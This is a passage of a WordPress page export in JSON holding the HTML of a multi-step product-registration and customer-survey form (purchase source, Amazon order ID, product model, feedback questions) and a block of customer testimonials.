>\u6cd5\u7f57\u7fa4\u5c9b<\/option><option value=\"PL\" >\u6ce2\u5170<\/option><option value=\"PR\" >\u6ce2\u591a\u9ece\u5404<\/option><option value=\"BA\" >\u6ce2\u65af\u5c3c\u4e9a\u548c\u9ed1\u585e\u54e5\u7ef4\u90a3<\/option><option value=\"TH\" >\u6cf0\u56fd<\/option><option value=\"ZW\" >\u6d25\u5df4\u5e03\u97e6<\/option><option value=\"HN\" >\u6d2a\u90fd\u62c9\u65af<\/option><option value=\"HT\" >\u6d77\u5730<\/option><option value=\"AU\" >\u6fb3\u6d32<\/option><option value=\"MO\" >\u6fb3\u95e8<\/option><option value=\"IE\" >\u7231\u5c14\u5170(\u5171\u548c\u56fd)<\/option><option value=\"EE\" >\u7231\u6c99\u5c3c\u4e9a<\/option><option value=\"JM\" >\u7259\u4e70\u52a0<\/option><option value=\"TC\" >\u7279\u514b\u65af\u548c\u51ef\u79d1\u65af\u7fa4\u5c9b<\/option><option value=\"TT\" >\u7279\u7acb\u5c3c\u8fbe\u548c\u591a\u5df4\u54e5<\/option><option value=\"BO\" >\u73bb\u5229\u7ef4\u4e9a\uff08\u591a\u6c11\u65cf\u56fd\uff09<\/option><option value=\"NR\" >\u7459\u9c81\u8bed (Naoero)<\/option><option value=\"SE\" >\u745e\u5178<\/option><option value=\"CH\" >\u745e\u58eb<\/option><option value=\"GP\" >\u74dc\u5fb7\u7f57\u666e\u5c9b<\/option><option value=\"WF\" >\u74e6\u5229\u65af\u7fa4\u5c9b\u548c\u5bcc\u56fe\u7eb3\u7fa4\u5c9b<\/option><option value=\"VU\" >\u74e6\u52aa\u963f\u56fe<\/option><option value=\"RE\" >\u7559\u5c3c\u6c6a\u5c9b<\/option><option value=\"BY\" >\u767d\u4fc4\u7f57\u65af<\/option><option value=\"BM\" >\u767e\u6155\u5927<\/option><option value=\"PN\" >\u76ae\u7279\u51ef\u6069<\/option><option value=\"GI\" >\u76f4\u5e03\u7f57\u9640<\/option><option value=\"FK\" >\u798f\u514b\u5170\u7fa4\u5c9b<\/option><option value=\"KW\" >\u79d1\u5a01\u7279<\/option><option value=\"KM\" >\u79d1\u6469\u7f57<\/option><option value=\"CI\" >\u79d1\u7279\u8fea\u74e6<\/option><option value=\"CC\" >\u79d1\u79d1\u65af\uff08\u57fa\u6797\uff09\u7fa4\u5c9b<\/option><option value=\"PE\" >\u79d8\u9c81<\/option><option value=\"TN\" >\u7a81\u5c3c\u65af<\/option><option value=\"LT\" >\u7acb\u9676\u5b9b<\/option><option value=\"SO\" >\u7d22\u9a6c\u91cc<\/option><option value=\"JO\" >\u7ea6\u65e6<\/option><option value=\"NA\" >\u7eb3\u7c73\u6bd4\u4e9a<\/option><option value=\"NU\" >\u7ebd\u57c3<\/option><option value=\"VI\" >\u7ef4\u5c14\u4eac\u7fa4\u5c9b\uff08\u7f8e\u56fd\uff09<\/option><option value=\"VG\" >\u7ef4\u5c14\u4eac\u7fa4\u5c9b\uff08\u82f1\u5c5e\uff09<\/option><option value=\"MM\" >\u7f05\u7538<\/option><option value=\"RO\" >\u7f57\u9a6c\u5c3c\u4e9a<\/option><option value=\"US\" >\u7f8e\u56fd<\/option><option value=\"UM\" >\u7f8e\u56fd\u672c\u571f\u5916\u5c0f\u5c9b\u5c7f<\/option><option value=\"AS\" >\u7f8e\u5c5e\u8428\u6469\u4e9a<\/option><option value=\"LA\" >\u8001\u631d\u4eba\u6c11\u6c11\u4e3b\u5171\u548c\u56fd<\/option><option value=\"KE\" >\u80af\u5c3c\u4e9a<\/option><option value=\"FI\" >\u82ac\u5170<\/option><option value=\"SD\" >\u82cf\u4e39<\/option><option value=\"SR\" >\u82cf\u91cc\u5357<\/option><option value=\"IO\" >\u82f1\u5c5e\u5370\u5ea6\u6d0b\u9886\u5730<\/option><option value=\"NL\" >\u8377\u5170<\/option><option value=\"MZ\" >\u83ab\u6851\u6bd4\u514b<\/option><option value=\"LS\" >\u83b1\u7d22\u6258<\/option><option value=\"PH\" >\u83f2\u5f8b\u5bbe<\/option><option value=\"SV\" >\u8428\u5c14\u74e6\u591a<\/option><option value=\"WS\" >\u8428\u6469\u4e9a<\/option><option value=\"PT\" >\u8461\u8404\u7259<\/option><option value=\"MN\" >\u8499\u53e4\u56fd<\/option><option value=\"MS\" >\u8499\u7279\u585e\u62c9\u7279<\/option><option value=\"EH\" >\u897f\u6492\u54c8\u62c9<\/option><option value=\"ES\" >\u897f\u73ed\u7259<\/option><option value=\"NF\" >\u8bfa\u798f\u514b\u5c9b<\/option><option value=\"BJ\" >\u8d1d\u5b81<\/option><option value=\"ZM\" >\u8d5e\u6bd4\u4e9a<\/option><option value=\"GQ\" >\u8d64\u9053\u51e0\u5185\u4e9a<\/option><option value=\"HM\" >\u8d6b\u5fb7\u5c9b\u548c\u9ea6\u514b\u5510\u7eb3\u7fa4\u5c9b<\/option><option value=\"AZ\" >\u963f\u585e\u62dc\u7586<\/option><option value=\"AF\" >\u963f\u5bcc\u6c57<\/option><option value=\"DZ\" >\u963f\u5c14\u53ca\u5229\u4e9a<\/option><option value=\"AL\" >\u963f\u5c14\u5df4\u5c3c\u4e9a<\/option><option value=\"SY\" >\u963f\u62c9\u4f2f\u53d9\u5229\u4e9a\u5171\u548c\u56fd<\/option><option value=\"AE\" >\u963f\u62c9\u4f2f\u8054\u5408\u914b\u957f\u56fd<\/option><option value=\"OM\" >\u963f\u66fc<\/option><option value=\"AR\" >\u963f\u6839\u5ef7<\/option><option value=\"AW\" >\u963f\u9c81\u5df4<\/option><option value=\"KR\" >\u97e9\u56fd<\/option><option value=\"HK\" >\u9999\u6e2f\u8bc1\u5238\u4ea4\u6613\u6240<\/option><option value=\"MV\" >\u9a6c\u5c14\u4ee3\u592b<\/option><option value=\"IM\" >\u9a6c\u6069\u5c9b<\/option><option value=\"MW\" >\u9a6c\u62c9\u7ef4<\/option><option value=\"MQ\" >\u9a6c\u63d0\u5c3c\u514b<\/option><option value=\"MY\" >\u9a6c\u6765\u897f\u4e9a<\/option><option value=\"YT\" >\u9a6c\u7ea6\u7279\u5c9b<\/option><option value=\"MH\" >\u9a6c\u7ecd\u5c14\u7fa4\u5c9b<\/option><option value=\"MT\" >\u9a6c\u8033\u4ed6<\/option><option value=\"MG\" >\u9a6c\u8fbe\u52a0\u65af\u52a0<\/option><option value=\"ML\" >\u9a6c\u91cc<\/option><option value=\"LB\" >\u9ece\u5df4\u5ae9<\/option><option value=\"ME\" >\u9ed1\u5c71<\/option><\/select><label for=\"wpforms-2597-field_6-country\" class=\"wpforms-field-sublabel after \">Country<\/label><\/div><\/div><\/div><div id=\"wpforms-2597-field_1-container\" class=\"wpforms-field wpforms-field-pagebreak\" data-field-id=\"1\"><div class=\"wpforms-clear wpforms-pagebreak-left\"><button class=\"wpforms-page-button wpforms-page-next\" data-action=\"next\" data-page=\"1\" data-formid=\"2597\" disabled>Next<\/button><\/div><\/div><\/div><div class=\"wpforms-page wpforms-page-2 \" style=\"display:none;\"><div id=\"wpforms-2597-field_8-container\" class=\"wpforms-field wpforms-field-select wpforms-conditional-trigger wpforms-field-select-style-classic\" data-field-id=\"8\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_8\">Purchased From <span class=\"wpforms-required-label\">*<\/span><\/label><select id=\"wpforms-2597-field_8\" class=\"wpforms-field-large wpforms-field-required\" name=\"wpforms[fields][8]\" required=\"required\"><option value=\"Amazon\" >Amazon<\/option><option value=\"Walmart\" >Walmart<\/option><option value=\"Others\" >Others<\/option><\/select><\/div><div id=\"wpforms-2597-field_27-container\" class=\"wpforms-field wpforms-field-checkbox wpforms-list-inline wpforms-conditional-field wpforms-conditional-show\" data-field-id=\"27\" style=\"display:none;\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_27\">Amazon Purchase Site: <span class=\"wpforms-required-label\">*<\/span><\/label><ul id=\"wpforms-2597-field_27\" class=\"wpforms-field-required\" data-choice-limit=\"1\"><li class=\"choice-1 depth-1\"><input type=\"checkbox\" id=\"wpforms-2597-field_27_1\" data-rule-check-limit=\"true\" name=\"wpforms[fields][27][]\" value=\"Amazon.com\" required ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_27_1\">Amazon.com<\/label><\/li><li class=\"choice-2 depth-1\"><input type=\"checkbox\" id=\"wpforms-2597-field_27_2\" data-rule-check-limit=\"true\" name=\"wpforms[fields][27][]\" value=\"Amazon.co.uk\" required ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_27_2\">Amazon.co.uk<\/label><\/li><li class=\"choice-3 depth-1\"><input type=\"checkbox\" id=\"wpforms-2597-field_27_3\" data-rule-check-limit=\"true\" name=\"wpforms[fields][27][]\" value=\"Amazon.ca\" required ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_27_3\">Amazon.ca<\/label><\/li><li class=\"choice-4 depth-1\"><input type=\"checkbox\" id=\"wpforms-2597-field_27_4\" data-rule-check-limit=\"true\" name=\"wpforms[fields][27][]\" value=\"Amazon.es\" required ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_27_4\">Amazon.es<\/label><\/li><li class=\"choice-5 depth-1\"><input type=\"checkbox\" id=\"wpforms-2597-field_27_5\" data-rule-check-limit=\"true\" name=\"wpforms[fields][27][]\" value=\"Amazon.it\" required ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_27_5\">Amazon.it<\/label><\/li><li class=\"choice-6 depth-1\"><input type=\"checkbox\" id=\"wpforms-2597-field_27_6\" data-rule-check-limit=\"true\" name=\"wpforms[fields][27][]\" value=\"Amazon.fr\" required ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_27_6\">Amazon.fr<\/label><\/li><li class=\"choice-7 depth-1\"><input type=\"checkbox\" id=\"wpforms-2597-field_27_7\" data-rule-check-limit=\"true\" name=\"wpforms[fields][27][]\" value=\"Amazon.de\" required ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_27_7\">Amazon.de<\/label><\/li><\/ul><\/div><div id=\"wpforms-2597-field_9-container\" class=\"wpforms-field wpforms-field-text wpforms-conditional-field wpforms-conditional-show\" data-field-id=\"9\" style=\"display:none;\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_9\">Order ID (Amazon) <span class=\"wpforms-required-label\">*<\/span><\/label><input type=\"text\" id=\"wpforms-2597-field_9\" class=\"wpforms-field-large wpforms-field-required wpforms-masked-input wpforms-limit-characters-enabled\" data-rule-inputmask-incomplete=\"1\" data-inputmask-mask=\"999-9999999-9999999\" data-form-id=\"2597\" data-field-id=\"9\" data-text-limit=\"19\" name=\"wpforms[fields][9]\" placeholder=\"XXX-XXXXXXX-XXXXXXX\" maxlength=\"19\" required><\/div><div id=\"wpforms-2597-field_10-container\" class=\"wpforms-field wpforms-field-text wpforms-conditional-field wpforms-conditional-show\" data-field-id=\"10\" style=\"display:none;\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_10\">Order ID (Walmart) <\/label><input type=\"text\" id=\"wpforms-2597-field_10\" class=\"wpforms-field-large wpforms-limit-characters-enabled\" data-form-id=\"2597\" data-field-id=\"10\" data-text-limit=\"1\" name=\"wpforms[fields][10]\" maxlength=\"1\" ><\/div><div id=\"wpforms-2597-field_12-container\" class=\"wpforms-field wpforms-field-date-time\" data-field-id=\"12\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_12\">Purchase Date <span class=\"wpforms-required-label\">*<\/span><\/label><div class=\"wpforms-datepicker-wrap\"><input type=\"text\" id=\"wpforms-2597-field_12\" class=\"wpforms-field-date-time-date wpforms-datepicker wpforms-field-required wpforms-field-large\" data-date-format=\"m\/d\/Y\" data-disable-past-dates=\"0\" data-input=\"true\" name=\"wpforms[fields][12][date]\" required><a title=\"Clear Date\" data-clear class=\"wpforms-datepicker-clear\" style=\"display:none;\"><\/a><\/div><\/div><div id=\"wpforms-2597-field_13-container\" class=\"wpforms-field wpforms-field-pagebreak\" data-field-id=\"13\"><div class=\"wpforms-clear wpforms-pagebreak-left\"><button class=\"wpforms-page-button wpforms-page-prev\" data-action=\"prev\" data-page=\"2\" data-formid=\"2597\" disabled>Back<\/button><button class=\"wpforms-page-button wpforms-page-next\" data-action=\"next\" data-page=\"2\" data-formid=\"2597\" disabled>Next<\/button><\/div><\/div><\/div><div class=\"wpforms-page wpforms-page-3 \" style=\"display:none;\"><div id=\"wpforms-2597-field_14-container\" class=\"wpforms-field wpforms-field-select wpforms-field-select-style-classic\" data-field-id=\"14\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_14\">Product Category <span class=\"wpforms-required-label\">*<\/span><\/label><select id=\"wpforms-2597-field_14\" class=\"wpforms-field-large wpforms-field-required\" name=\"wpforms[fields][14]\" required=\"required\"><option value=\"3C\" >3C<\/option><option value=\"Kitchen Appliance\" >Kitchen Appliance<\/option><option value=\"Garden\" >Garden<\/option><option value=\"Pets\" >Pets<\/option><option value=\"Battery\" >Battery<\/option><option value=\"Battery\" >Battery<\/option><\/select><\/div><div id=\"wpforms-2597-field_15-container\" class=\"wpforms-field wpforms-field-text\" data-field-id=\"15\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_15\">Product Model Number<\/label><input type=\"text\" id=\"wpforms-2597-field_15\" class=\"wpforms-field-large\" name=\"wpforms[fields][15]\" ><div class=\"wpforms-field-description\">Please check the manual or sticker on your unit to find the model number.<\/div><\/div><div id=\"wpforms-2597-field_16-container\" class=\"wpforms-field wpforms-field-text\" data-field-id=\"16\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_16\">Product Batch Number (B\/N)<\/label><input type=\"text\" id=\"wpforms-2597-field_16\" class=\"wpforms-field-large\" name=\"wpforms[fields][16]\" ><\/div><div id=\"wpforms-2597-field_17-container\" class=\"wpforms-field wpforms-field-pagebreak\" data-field-id=\"17\"><div class=\"wpforms-clear wpforms-pagebreak-left\"><button class=\"wpforms-page-button wpforms-page-prev\" data-action=\"prev\" data-page=\"3\" data-formid=\"2597\" disabled>Back<\/button><button class=\"wpforms-page-button wpforms-page-next\" data-action=\"next\" data-page=\"3\" data-formid=\"2597\" disabled>Next<\/button><\/div><\/div><\/div><div class=\"wpforms-page wpforms-page-4 \" style=\"display:none;\"><div id=\"wpforms-2597-field_18-container\" class=\"wpforms-field wpforms-field-select wpforms-field-select-style-classic\" data-field-id=\"18\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_18\">How did you find us?<\/label><select id=\"wpforms-2597-field_18\" class=\"wpforms-field-large\" name=\"wpforms[fields][18]\"><option value=\"Google\" >Google<\/option><option value=\"Youtube\" >Youtube<\/option><option value=\"Instagram\" >Instagram<\/option><option value=\"Amazon\" >Amazon<\/option><option value=\"Facebook\" >Facebook<\/option><option value=\"Friend\" >Friend<\/option><option value=\"Others\" >Others<\/option><\/select><\/div><div id=\"wpforms-2597-field_19-container\" class=\"wpforms-field wpforms-field-radio wpforms-list-inline\" data-field-id=\"19\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_19\">Have you purchased our products before?<\/label><ul id=\"wpforms-2597-field_19\"><li class=\"choice-1 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_19_1\" name=\"wpforms[fields][19]\" value=\"Yes\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_19_1\">Yes<\/label><\/li><li class=\"choice-2 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_19_2\" name=\"wpforms[fields][19]\" value=\"No\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_19_2\">No<\/label><\/li><li class=\"choice-3 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_19_3\" name=\"wpforms[fields][19]\" value=\"Not Sure\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_19_3\">Not Sure<\/label><\/li><\/ul><\/div><div id=\"wpforms-2597-field_20-container\" class=\"wpforms-field wpforms-field-radio wpforms-list-inline\" data-field-id=\"20\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_20\">What drives your purchasing decisions?<\/label><ul id=\"wpforms-2597-field_20\"><li class=\"choice-1 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_20_1\" name=\"wpforms[fields][20]\" value=\"Price\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_20_1\">Price<\/label><\/li><li class=\"choice-2 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_20_2\" name=\"wpforms[fields][20]\" value=\"Design\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_20_2\">Design<\/label><\/li><li class=\"choice-3 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_20_3\" name=\"wpforms[fields][20]\" value=\"Brand\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_20_3\">Brand<\/label><\/li><li class=\"choice-4 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_20_4\" name=\"wpforms[fields][20]\" value=\"Quality\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_20_4\">Quality<\/label><\/li><li class=\"choice-5 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_20_5\" name=\"wpforms[fields][20]\" value=\"Customer Service\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_20_5\">Customer Service<\/label><\/li><li class=\"choice-6 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_20_6\" name=\"wpforms[fields][20]\" value=\"Personal Recommendations\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_20_6\">Personal Recommendations<\/label><\/li><\/ul><\/div><div id=\"wpforms-2597-field_21-container\" class=\"wpforms-field wpforms-field-textarea\" data-field-id=\"21\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_21\">Specific Requirement(s)<\/label><textarea id=\"wpforms-2597-field_21\" class=\"wpforms-field-medium\" name=\"wpforms[fields][21]\" ><\/textarea><\/div><div id=\"wpforms-2597-field_22-container\" class=\"wpforms-field wpforms-field-radio wpforms-list-inline\" data-field-id=\"22\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_22\">How likely are you to recommend us to a friend or colleague?<\/label><ul id=\"wpforms-2597-field_22\"><li class=\"choice-1 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_22_1\" name=\"wpforms[fields][22]\" value=\"Very Likely\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_22_1\">Very Likely<\/label><\/li><li class=\"choice-2 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_22_2\" name=\"wpforms[fields][22]\" value=\"Somewhat Likely\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_22_2\">Somewhat Likely<\/label><\/li><li class=\"choice-3 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_22_3\" name=\"wpforms[fields][22]\" value=\"Neutral\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_22_3\">Neutral<\/label><\/li><li class=\"choice-4 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_22_4\" name=\"wpforms[fields][22]\" value=\"Somewhat Unlikely\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_22_4\">Somewhat Unlikely<\/label><\/li><li class=\"choice-5 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_22_5\" name=\"wpforms[fields][22]\" value=\"Very Unlikely\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_22_5\">Very Unlikely<\/label><\/li><\/ul><\/div><div id=\"wpforms-2597-field_23-container\" class=\"wpforms-field wpforms-field-textarea\" data-field-id=\"23\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_23\">What can we do to improve?<\/label><textarea id=\"wpforms-2597-field_23\" class=\"wpforms-field-medium\" name=\"wpforms[fields][23]\" ><\/textarea><\/div><div id=\"wpforms-2597-field_24-container\" class=\"wpforms-field wpforms-field-pagebreak\" data-field-id=\"24\"><div class=\"wpforms-clear wpforms-pagebreak-left\"><button class=\"wpforms-page-button wpforms-page-prev\" data-action=\"prev\" data-page=\"4\" data-formid=\"2597\" disabled>Back<\/button><button class=\"wpforms-page-button wpforms-page-next\" data-action=\"next\" data-page=\"4\" data-formid=\"2597\" disabled>Next<\/button><\/div><\/div><\/div><div class=\"wpforms-page wpforms-page-5 last \" style=\"display:none;\"><div id=\"wpforms-2597-field_25-container\" class=\"wpforms-field wpforms-field-radio\" data-field-id=\"25\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_25\">Submit & Finish<\/label><ul id=\"wpforms-2597-field_25\"><li class=\"choice-1 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_25_1\" name=\"wpforms[fields][25]\" value=\"I'd like to receive exclusive deals, news, and updates\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_25_1\">I'd like to receive exclusive deals, news, and updates<\/label><\/li><li class=\"choice-2 depth-1\"><input type=\"radio\" id=\"wpforms-2597-field_25_2\" name=\"wpforms[fields][25]\" value=\"I want to particiapte in giveaway events\" ><label class=\"wpforms-field-label-inline\" for=\"wpforms-2597-field_25_2\">I want to particiapte in giveaway events<\/label><\/li><\/ul><\/div><div id=\"wpforms-2597-field_3-container\" class=\"wpforms-field wpforms-field-pagebreak\" data-field-id=\"3\"><div class=\"wpforms-clear wpforms-pagebreak-left\"><\/div><\/div><\/div><\/div><div class=\"wpforms-recaptcha-container wpforms-is-hcaptcha\" style=\"display:none;\"><div class=\"g-recaptcha\" data-sitekey=\"3a1cb012-f25f-47bc-9e31-fe76cf7684a2\"><\/div><input type=\"text\" name=\"g-recaptcha-hidden\" class=\"wpforms-recaptcha-hidden\" style=\"position:absolute!important;clip:rect(0,0,0,0)!important;height:1px!important;width:1px!important;border:0!important;overflow:hidden!important;padding:0!important;margin:0!important;\" required><\/div><div class=\"wpforms-submit-container\" style=\"display:none;\"><input type=\"hidden\" name=\"wpforms[id]\" value=\"2597\"><input type=\"hidden\" name=\"wpforms[author]\" value=\"1\"><button type=\"submit\" name=\"wpforms[submit]\" id=\"wpforms-submit-2597\" class=\"wpforms-submit\" data-alt-text=\"Submit\u2026\" data-submit-text=\"Finish\" aria-live=\"assertive\" value=\"wpforms-submit\">Finish<\/button><img src=\"https:\/\/www.primesupportpro.com\/wp-content\/plugins\/wpforms\/assets\/images\/submit-spin.svg\" class=\"wpforms-submit-spinner\" style=\"display: none;\" width=\"26\" height=\"26\" alt=\"\u52a0\u8f7d\"><\/div><\/form><\/div> <!-- .wpforms-container --><\/div>\n<\/div><\/div>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-9d6783d2 alignfull uagb-is-root-container\">\n<div class=\"inherit-container-width is-layout-constrained wp-block-group alignfull\" style=\"margin-top:40px;margin-bottom:40px;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px\"><div class=\"wp-block-group__inner-container\">\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c1beee92\"><h2 class=\"uagb-heading-text\">Our Happy Clients!<\/h2><\/div>\n\n\n\n<div class=\"is-layout-flex wp-container-23 wp-block-columns alignwide are-vertically-aligned-center\" style=\"border-radius:0px;padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:10px\">\n<div class=\"is-layout-flow wp-block-column is-vertically-aligned-center\">\n<div class=\"inherit-container-width is-layout-constrained wp-block-group has-ast-global-color-1-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<div class=\"wp-block-uagb-advanced-heading uagb-block-06acebc0\"><h4 class=\"uagb-heading-text\">Very nice quality.<\/h4><\/div>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-0584a6ea\"><h6 class=\"uagb-heading-text\">\u201cHave used a few times, easy to carry cat and she likes the cushion inside. \u201d<\/h6><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/wh-nuhkzqsnf41dxlm3upk.my3w.com\/wp-content\/uploads\/2022\/10\/star-rating.png\" alt=\"\" class=\"wp-image-56275\"\/><\/figure>\n\n\n\n<div class=\"is-layout-flex wp-container-10 wp-block-columns\">\n<div class=\"is-layout-flow wp-block-column is-vertically-aligned-center\" style=\"flex-basis:25%\">\n<figure class=\"wp-block-image alignleft size-thumbnail is-resized is-style-rounded\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/10\/member1-150x150.jpg\" alt=\"\" class=\"wp-image-2230\" width=\"32\" height=\"32\" srcset=\"https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/10\/member1-150x150.jpg 150w, https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/10\/member1.jpg 250w\" sizes=\"(max-width: 32px) 100vw, 32px\" \/><\/figure>\n<\/div>\n\n\n\n<div class=\"is-layout-flow wp-block-column is-vertically-aligned-center\" style=\"flex-basis:75%\">\n<div class=\"wp-block-uagb-advanced-heading uagb-block-755f1eaa\"><h6 class=\"uagb-heading-text\">Amazon Customer<\/h6><\/div>\n<\/div>\n<\/div>\n<\/div><\/div>\n<\/div>\n\n\n\n<div class=\"is-layout-flow wp-block-column is-vertically-aligned-center\">\n<div class=\"inherit-container-width is-layout-constrained wp-block-group has-ast-global-color-1-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<div class=\"wp-block-uagb-advanced-heading uagb-block-ba5d8f53\"><h4 class=\"uagb-heading-text\">Love it\uff01<\/h4><\/div>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-59ca9af2\"><h6 class=\"uagb-heading-text\">\u201cIt\u2019s so cute, it looks great in my kitchen and works great. Love it!\u201d<\/h6><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/wh-nuhkzqsnf41dxlm3upk.my3w.com\/wp-content\/uploads\/2022\/10\/star-rating.png\" alt=\"\" class=\"wp-image-56275\"\/><\/figure>\n\n\n\n<div class=\"is-layout-flex wp-container-15 wp-block-columns are-vertically-aligned-center\">\n<div class=\"is-layout-flow wp-block-column is-vertically-aligned-center\" style=\"flex-basis:25%\">\n<figure class=\"wp-block-image alignleft size-thumbnail is-resized is-style-rounded\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/10\/member3-150x150.jpg\" alt=\"\" class=\"wp-image-2229\" width=\"32\" height=\"32\" srcset=\"https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/10\/member3-150x150.jpg 150w, https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/10\/member3.jpg 250w\" sizes=\"(max-width: 32px) 100vw, 32px\" \/><\/figure>\n<\/div>\n\n\n\n<div class=\"is-layout-flow wp-block-column is-vertically-aligned-center\" style=\"flex-basis:75%\">\n<div class=\"wp-block-uagb-advanced-heading uagb-block-49c5b853\"><h6 class=\"uagb-heading-text\">Jessica From AMZ<\/h6><\/div>\n<\/div>\n<\/div>\n<\/div><\/div>\n<\/div>\n\n\n\n<div class=\"is-layout-flow wp-block-column is-vertically-aligned-center\">\n<div class=\"inherit-container-width is-layout-constrained wp-block-group has-ast-global-color-1-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<div class=\"wp-block-uagb-advanced-heading uagb-block-304c62b1\"><h4 class=\"uagb-heading-text\">Extremely bright!<\/h4><\/div>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-1f962c41\"><h6 class=\"uagb-heading-text\">\u201cLove the compact size and the brightness is awesome…\u201d<\/h6><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/wh-nuhkzqsnf41dxlm3upk.my3w.com\/wp-content\/uploads\/2022\/10\/star-rating.png\" alt=\"\" class=\"wp-image-56275\"\/><\/figure>\n\n\n\n<div class=\"is-layout-flex wp-container-20 wp-block-columns are-vertically-aligned-center\">\n<div class=\"is-layout-flow wp-block-column is-vertically-aligned-center\" style=\"flex-basis:25%\">\n<figure class=\"wp-block-image alignleft size-thumbnail is-resized is-style-rounded\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/10\/member2-1-150x150.jpg\" alt=\"\" class=\"wp-image-2228\" width=\"32\" height=\"32\" srcset=\"https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/10\/member2-1-150x150.jpg 150w, https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/10\/member2-1.jpg 250w\" sizes=\"(max-width: 32px) 100vw, 32px\" \/><\/figure>\n<\/div>\n\n\n\n<div class=\"is-layout-flow wp-block-column is-vertically-aligned-center\" style=\"flex-basis:75%\">\n<div class=\"wp-block-uagb-advanced-heading uagb-block-3af4a5d0\"><h6 class=\"uagb-heading-text\">Audra From AMZ<\/h6><\/div>\n<\/div>\n<\/div>\n<\/div><\/div>\n<\/div>\n<\/div>\n<\/div><\/div>\n<\/div>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"page-builder","ast-global-header-display":"disabled","ast-main-header-display":"disabled","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"disabled","site-post-title":"disabled","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"disabled","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":""},"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false},"uagb_author_info":{"display_name":"Keenstone","author_link":"https:\/\/www.primesupportpro.com\/author\/keenstone\/"},"uagb_